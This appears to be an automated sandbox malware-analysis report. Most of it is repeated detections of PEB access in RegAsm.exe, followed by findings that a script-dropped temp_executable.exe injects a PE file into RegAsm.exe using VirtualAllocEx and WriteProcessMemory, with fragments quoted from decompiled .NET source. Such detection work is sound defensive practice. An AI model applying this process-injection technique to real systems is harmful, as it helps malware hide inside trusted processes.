Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FC5152 mov eax, dword ptr fs:[00000030h] 10_2_02FC5152
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EEC156 mov eax, dword ptr fs:[00000030h] 10_2_02EEC156
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EF6154 mov eax, dword ptr fs:[00000030h] 10_2_02EF6154
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EF6154 mov eax, dword ptr fs:[00000030h] 10_2_02EF6154
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F84144 mov eax, dword ptr fs:[00000030h] 10_2_02F84144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F84144 mov eax, dword ptr fs:[00000030h] 10_2_02F84144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F84144 mov ecx, dword ptr fs:[00000030h] 10_2_02F84144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F84144 mov eax, dword ptr fs:[00000030h] 10_2_02F84144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F84144 mov eax, dword ptr fs:[00000030h] 10_2_02F84144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EF7152 mov eax, dword ptr fs:[00000030h] 10_2_02EF7152
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F20124 mov eax, dword ptr fs:[00000030h] 10_2_02F20124
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EEB136 mov eax, dword ptr fs:[00000030h] 10_2_02EEB136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EEB136 mov eax, dword ptr fs:[00000030h] 10_2_02EEB136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EEB136 mov eax, dword ptr fs:[00000030h] 10_2_02EEB136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EEB136 mov eax, dword ptr fs:[00000030h] 10_2_02EEB136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EF1131 mov eax, dword ptr fs:[00000030h] 10_2_02EF1131
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EF1131 mov eax, dword ptr fs:[00000030h] 10_2_02EF1131
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F9A118 mov ecx, dword ptr fs:[00000030h] 10_2_02F9A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F9A118 mov eax, dword ptr fs:[00000030h] 10_2_02F9A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F9A118 mov eax, dword ptr fs:[00000030h] 10_2_02F9A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F9A118 mov eax, dword ptr fs:[00000030h] 10_2_02F9A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FB0115 mov eax, dword ptr fs:[00000030h] 10_2_02FB0115
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F6E6F2 mov eax, dword ptr fs:[00000030h] 10_2_02F6E6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F6E6F2 mov eax, dword ptr fs:[00000030h] 10_2_02F6E6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F6E6F2 mov eax, dword ptr fs:[00000030h] 10_2_02F6E6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F6E6F2 mov eax, dword ptr fs:[00000030h] 10_2_02F6E6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F706F1 mov eax, dword ptr fs:[00000030h] 10_2_02F706F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F706F1 mov eax, dword ptr fs:[00000030h] 10_2_02F706F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FAD6F0 mov eax, dword ptr fs:[00000030h] 10_2_02FAD6F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F1D6E0 mov eax, dword ptr fs:[00000030h] 10_2_02F1D6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F1D6E0 mov eax, dword ptr fs:[00000030h] 10_2_02F1D6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F836EE mov eax, dword ptr fs:[00000030h] 10_2_02F836EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F836EE mov eax, dword ptr fs:[00000030h] 10_2_02F836EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F836EE mov eax, dword ptr fs:[00000030h] 10_2_02F836EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F836EE mov eax, dword ptr fs:[00000030h] 10_2_02F836EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F836EE mov eax, dword ptr fs:[00000030h] 10_2_02F836EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F836EE mov eax, dword ptr fs:[00000030h] 10_2_02F836EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F236EF mov eax, dword ptr fs:[00000030h] 10_2_02F236EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EFB6C0 mov eax, dword ptr fs:[00000030h] 10_2_02EFB6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EFB6C0 mov eax, dword ptr fs:[00000030h] 10_2_02EFB6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EFB6C0 mov eax, dword ptr fs:[00000030h] 10_2_02EFB6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EFB6C0 mov eax, dword ptr fs:[00000030h] 10_2_02EFB6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EFB6C0 mov eax, dword ptr fs:[00000030h] 10_2_02EFB6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EFB6C0 mov eax, dword ptr fs:[00000030h] 10_2_02EFB6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F2A6C7 mov ebx, dword ptr fs:[00000030h] 10_2_02F2A6C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F2A6C7 mov eax, dword ptr fs:[00000030h] 10_2_02F2A6C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FB16CC mov eax, dword ptr fs:[00000030h] 10_2_02FB16CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FB16CC mov eax, dword ptr fs:[00000030h] 10_2_02FB16CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FB16CC mov eax, dword ptr fs:[00000030h] 10_2_02FB16CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FB16CC mov eax, dword ptr fs:[00000030h] 10_2_02FB16CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FAF6C7 mov eax, dword ptr fs:[00000030h] 10_2_02FAF6C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F216CF mov eax, dword ptr fs:[00000030h] 10_2_02F216CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F266B0 mov eax, dword ptr fs:[00000030h] 10_2_02F266B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EED6AA mov eax, dword ptr fs:[00000030h] 10_2_02EED6AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EED6AA mov eax, dword ptr fs:[00000030h] 10_2_02EED6AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F2C6A6 mov eax, dword ptr fs:[00000030h] 10_2_02F2C6A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EE76B2 mov eax, dword ptr fs:[00000030h] 10_2_02EE76B2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EE76B2 mov eax, dword ptr fs:[00000030h] 10_2_02EE76B2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EE76B2 mov eax, dword ptr fs:[00000030h] 10_2_02EE76B2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F7368C mov eax, dword ptr fs:[00000030h] 10_2_02F7368C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F7368C mov eax, dword ptr fs:[00000030h] 10_2_02F7368C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F7368C mov eax, dword ptr fs:[00000030h] 10_2_02F7368C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F7368C mov eax, dword ptr fs:[00000030h] 10_2_02F7368C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EF4690 mov eax, dword ptr fs:[00000030h] 10_2_02EF4690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EF4690 mov eax, dword ptr fs:[00000030h] 10_2_02EF4690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F22674 mov eax, dword ptr fs:[00000030h] 10_2_02F22674
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F2A660 mov eax, dword ptr fs:[00000030h] 10_2_02F2A660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F2A660 mov eax, dword ptr fs:[00000030h] 10_2_02F2A660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F29660 mov eax, dword ptr fs:[00000030h] 10_2_02F29660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F29660 mov eax, dword ptr fs:[00000030h] 10_2_02F29660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FB866E mov eax, dword ptr fs:[00000030h] 10_2_02FB866E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FB866E mov eax, dword ptr fs:[00000030h] 10_2_02FB866E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F0C640 mov eax, dword ptr fs:[00000030h] 10_2_02F0C640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EF262C mov eax, dword ptr fs:[00000030h] 10_2_02EF262C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EEF626 mov eax, dword ptr fs:[00000030h] 10_2_02EEF626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EEF626 mov eax, dword ptr fs:[00000030h] 10_2_02EEF626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EEF626 mov eax, dword ptr fs:[00000030h] 10_2_02EEF626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EEF626 mov eax, dword ptr fs:[00000030h] 10_2_02EEF626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EEF626 mov eax, dword ptr fs:[00000030h] 10_2_02EEF626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EEF626 mov eax, dword ptr fs:[00000030h] 10_2_02EEF626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EEF626 mov eax, dword ptr fs:[00000030h] 10_2_02EEF626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EEF626 mov eax, dword ptr fs:[00000030h] 10_2_02EEF626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EEF626 mov eax, dword ptr fs:[00000030h] 10_2_02EEF626
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FC5636 mov eax, dword ptr fs:[00000030h] 10_2_02FC5636
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F26620 mov eax, dword ptr fs:[00000030h] 10_2_02F26620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F28620 mov eax, dword ptr fs:[00000030h] 10_2_02F28620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F0E627 mov eax, dword ptr fs:[00000030h] 10_2_02F0E627
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F32619 mov eax, dword ptr fs:[00000030h] 10_2_02F32619
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F2F603 mov eax, dword ptr fs:[00000030h] 10_2_02F2F603
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F21607 mov eax, dword ptr fs:[00000030h] 10_2_02F21607
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EF3616 mov eax, dword ptr fs:[00000030h] 10_2_02EF3616
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EF3616 mov eax, dword ptr fs:[00000030h] 10_2_02EF3616
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F0260B mov eax, dword ptr fs:[00000030h] 10_2_02F0260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F0260B mov eax, dword ptr fs:[00000030h] 10_2_02F0260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F0260B mov eax, dword ptr fs:[00000030h] 10_2_02F0260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F0260B mov eax, dword ptr fs:[00000030h] 10_2_02F0260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F0260B mov eax, dword ptr fs:[00000030h] 10_2_02F0260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F0260B mov eax, dword ptr fs:[00000030h] 10_2_02F0260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F0260B mov eax, dword ptr fs:[00000030h] 10_2_02F0260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F6E609 mov eax, dword ptr fs:[00000030h] 10_2_02F6E609
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EFD7E0 mov ecx, dword ptr fs:[00000030h] 10_2_02EFD7E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EF47FB mov eax, dword ptr fs:[00000030h] 10_2_02EF47FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EF47FB mov eax, dword ptr fs:[00000030h] 10_2_02EF47FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F7E7E1 mov eax, dword ptr fs:[00000030h] 10_2_02F7E7E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F127ED mov eax, dword ptr fs:[00000030h] 10_2_02F127ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F127ED mov eax, dword ptr fs:[00000030h] 10_2_02F127ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F127ED mov eax, dword ptr fs:[00000030h] 10_2_02F127ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EFC7C0 mov eax, dword ptr fs:[00000030h] 10_2_02EFC7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EF57C0 mov eax, dword ptr fs:[00000030h] 10_2_02EF57C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EF57C0 mov eax, dword ptr fs:[00000030h] 10_2_02EF57C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EF57C0 mov eax, dword ptr fs:[00000030h] 10_2_02EF57C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F707C3 mov eax, dword ptr fs:[00000030h] 10_2_02F707C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EF07AF mov eax, dword ptr fs:[00000030h] 10_2_02EF07AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F1D7B0 mov eax, dword ptr fs:[00000030h] 10_2_02F1D7B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FC37B6 mov eax, dword ptr fs:[00000030h] 10_2_02FC37B6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EEF7BA mov eax, dword ptr fs:[00000030h] 10_2_02EEF7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EEF7BA mov eax, dword ptr fs:[00000030h] 10_2_02EEF7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EEF7BA mov eax, dword ptr fs:[00000030h] 10_2_02EEF7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EEF7BA mov eax, dword ptr fs:[00000030h] 10_2_02EEF7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EEF7BA mov eax, dword ptr fs:[00000030h] 10_2_02EEF7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EEF7BA mov eax, dword ptr fs:[00000030h] 10_2_02EEF7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EEF7BA mov eax, dword ptr fs:[00000030h] 10_2_02EEF7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EEF7BA mov eax, dword ptr fs:[00000030h] 10_2_02EEF7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EEF7BA mov eax, dword ptr fs:[00000030h] 10_2_02EEF7BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F7F7AF mov eax, dword ptr fs:[00000030h] 10_2_02F7F7AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F7F7AF mov eax, dword ptr fs:[00000030h] 10_2_02F7F7AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F7F7AF mov eax, dword ptr fs:[00000030h] 10_2_02F7F7AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F7F7AF mov eax, dword ptr fs:[00000030h] 10_2_02F7F7AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F7F7AF mov eax, dword ptr fs:[00000030h] 10_2_02F7F7AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F797A9 mov eax, dword ptr fs:[00000030h] 10_2_02F797A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FAF78A mov eax, dword ptr fs:[00000030h] 10_2_02FAF78A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F00770 mov eax, dword ptr fs:[00000030h] 10_2_02F00770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F00770 mov eax, dword ptr fs:[00000030h] 10_2_02F00770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F00770 mov eax, dword ptr fs:[00000030h] 10_2_02F00770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F00770 mov eax, dword ptr fs:[00000030h] 10_2_02F00770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F00770 mov eax, dword ptr fs:[00000030h] 10_2_02F00770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F00770 mov eax, dword ptr fs:[00000030h] 10_2_02F00770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F00770 mov eax, dword ptr fs:[00000030h] 10_2_02F00770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F00770 mov eax, dword ptr fs:[00000030h] 10_2_02F00770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F00770 mov eax, dword ptr fs:[00000030h] 10_2_02F00770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F00770 mov eax, dword ptr fs:[00000030h] 10_2_02F00770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F00770 mov eax, dword ptr fs:[00000030h] 10_2_02F00770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F00770 mov eax, dword ptr fs:[00000030h] 10_2_02F00770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EEB765 mov eax, dword ptr fs:[00000030h] 10_2_02EEB765
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EEB765 mov eax, dword ptr fs:[00000030h] 10_2_02EEB765
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EEB765 mov eax, dword ptr fs:[00000030h] 10_2_02EEB765
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EEB765 mov eax, dword ptr fs:[00000030h] 10_2_02EEB765
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EF8770 mov eax, dword ptr fs:[00000030h] 10_2_02EF8770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F74755 mov eax, dword ptr fs:[00000030h] 10_2_02F74755
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F32750 mov eax, dword ptr fs:[00000030h] 10_2_02F32750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F32750 mov eax, dword ptr fs:[00000030h] 10_2_02F32750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F7E75D mov eax, dword ptr fs:[00000030h] 10_2_02F7E75D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F03740 mov eax, dword ptr fs:[00000030h] 10_2_02F03740
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F03740 mov eax, dword ptr fs:[00000030h] 10_2_02F03740
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F03740 mov eax, dword ptr fs:[00000030h] 10_2_02F03740
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FC3749 mov eax, dword ptr fs:[00000030h] 10_2_02FC3749
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EF0750 mov eax, dword ptr fs:[00000030h] 10_2_02EF0750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F2674D mov esi, dword ptr fs:[00000030h] 10_2_02F2674D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F2674D mov eax, dword ptr fs:[00000030h] 10_2_02F2674D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F2674D mov eax, dword ptr fs:[00000030h] 10_2_02F2674D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FCB73C mov eax, dword ptr fs:[00000030h] 10_2_02FCB73C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FCB73C mov eax, dword ptr fs:[00000030h] 10_2_02FCB73C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FCB73C mov eax, dword ptr fs:[00000030h] 10_2_02FCB73C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FCB73C mov eax, dword ptr fs:[00000030h] 10_2_02FCB73C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F6C730 mov eax, dword ptr fs:[00000030h] 10_2_02F6C730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F25734 mov eax, dword ptr fs:[00000030h] 10_2_02F25734
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F2273C mov eax, dword ptr fs:[00000030h] 10_2_02F2273C
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Benign windows process drops PE files
Source: C:\Windows\System32\wscript.exe File created: temp_executable.exe.0.dr Jump to dropped file
.NET source code references suspicious native API functions
Source: temp_executable.exe.0.dr, ProcessExecutor.cs Reference to suspicious API methods: App.ReadProcessMemory(Settings.pi.ProcessHandle, num3 + 8, ref buffer, 4, ref bytesRead)
Source: temp_executable.exe.0.dr, ProcessExecutor.cs Reference to suspicious API methods: App.VirtualAllocEx(Settings.pi.ProcessHandle, num2, length, 12288, 64)
Source: temp_executable.exe.0.dr, ProcessExecutor.cs Reference to suspicious API methods: App.WriteProcessMemory(Settings.pi.ProcessHandle, num4, payload, bufferSize, ref bytesRead)
Allocates memory in foreign processes
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A Jump to behavior
Writes to foreign memory regions
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: CE3008 Jump to behavior
